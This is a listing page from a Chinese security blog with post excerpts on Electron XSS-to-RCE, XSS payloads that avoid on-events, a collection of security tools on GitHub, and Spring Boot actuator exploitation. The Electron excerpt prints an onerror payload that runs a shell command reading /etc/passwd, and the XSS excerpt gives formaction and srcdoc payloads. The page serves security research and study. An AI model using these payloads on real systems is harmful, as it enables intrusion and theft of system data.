最新发布 第4页

A0xpg博客欢迎你

未分类

Electron XSS RCE POC

Electron XSS RCE POC
蚁剑用Electron开发,当前程序的上下文应该是node,于是我们可以调用node模块进行RCE POC <img src=# onerror="require('child_process').exec('cat /etc/passwd',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });"> 反弹shell requir……继续阅读 »

Admin 1年前 (2019-04-15) 703浏览 0评论 0个赞

未分类

优秀github项目收集

优秀github项目收集
赏金猎人漏洞详情 https://github.com/ngalongc/bug-bounty-reference/   fuzzdb https://github.com/fuzzdb-project/fuzzdb   扫描器 https://github.com/robertdavidgraham/masscan   安全从业人员常用工具及学习指引 https://github.co……继续阅读 »

Admin 1年前 (2019-03-22) 327浏览 0评论 0个赞

技术总结

Web安全-xss-payload

Web安全-xss-payload
不使用on事件的xss h5:formaction 属性覆盖 form 元素的 action 属性,点击图片触发 <form><input formaction=javascript:alert(1) type=image src="http://www.a0xpg.com/log.jpg"> <iframe srcdoc=<svg/o&#x6Eload&equal……继续阅读 »

Admin 1年前 (2019-03-22) 323浏览 0评论 3个赞

技术总结

Springboot之actuator配置不当的漏洞利用

Springboot之actuator配置不当的漏洞利用
文章引自:https://www.freebuf.com/news/193509.html Http 方法 路径 描述 get /autoconfig 提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过 get /configprops 描述配置属性(包含默认值)如何注入 Bean get /beans 描述应用程序上下文里全部的 Bean,以及它们的关系 get /dump 获……继续阅读 »

Admin 1年前 (2019-02-25) 1328浏览 0评论 2个赞